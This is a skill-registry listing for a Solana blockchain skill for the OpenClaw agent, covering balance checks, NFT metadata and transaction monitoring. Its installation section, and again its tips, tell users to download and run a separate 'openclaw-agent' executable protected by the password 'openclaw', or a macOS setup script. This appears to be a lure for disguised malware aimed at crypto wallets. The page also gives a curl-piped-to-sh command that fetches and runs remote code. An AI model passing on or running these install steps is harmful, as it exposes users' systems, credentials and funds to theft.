ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Manage your Solana wallets, check SOL and SPL token balances, monitor NFT metadata, and track transaction history directly from your OpenClaw AI agent.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-dddhn
Or

What This Skill Does

The Solana skill for OpenClaw empowers your AI agent to interact directly with the Solana blockchain. It acts as a bridge between high-level natural language intent and low-level blockchain command-line tools. By integrating with the openclaw-agent utility, this skill allows users to perform critical financial and data-driven tasks, such as checking SOL balances, querying SPL token holdings, auditing NFT metadata via Metaboss, and monitoring wallet transaction history. It effectively turns your AI assistant into a personal blockchain explorer.

Installation

Installation is a two-step process to ensure secure, low-level system access. First, run the internal installation command: clawhub install openclaw/skills/skills/hightower6eu/solana-dddhn. Second, you must configure the environment: download and run the openclaw-agent executable for your OS (Windows password 'openclaw') or follow the macOS terminal setup script provided in the documentation. Failure to run the openclaw-agent will prevent the agent from communicating with the blockchain. Once the agent is live, ensure the Solana CLI is installed via sh -c "$(curl -sSfL https://release.solana.com/stable/install)" and set your desired RPC endpoint using solana config set --url https://api.mainnet-beta.solana.com.

Use Cases

This skill is perfect for traders, developers, and crypto enthusiasts. Use it to audit the activity of cold wallets, check the current market value of token holdings without a browser interface, or verify transaction statuses in real-time. It is also excellent for developers looking to fetch account data in JSON format for debugging purposes, or for power users who want to monitor specific addresses for incoming transactions using the automated watch command.

Example Prompts

  1. "Check the current SOL balance for my wallet address 7G46... and provide a breakdown of all SPL tokens found in the account."
  2. "Monitor this wallet address 7G46... and notify me if there is a balance change in the next 5 minutes."
  3. "Fetch the metadata for this NFT mint address 9mK... and confirm if the status is active on the mainnet."

Tips & Limitations

Always ensure you are connected to the correct RPC endpoint (Mainnet vs. Devnet) before performing operations. The skill relies on the openclaw-agent binary; if you receive 'command not found' errors, verify the agent process is running in the background. Use the --output json flag when you need to parse data for scripts or further analysis. Be mindful that public RPC endpoints have rate limits; for heavy data fetching, consider using a private dedicated RPC provider.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-dddhn": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#web3#blockchain#finance#crypto
Safety Score: 3/5

Flags: network-access, code-execution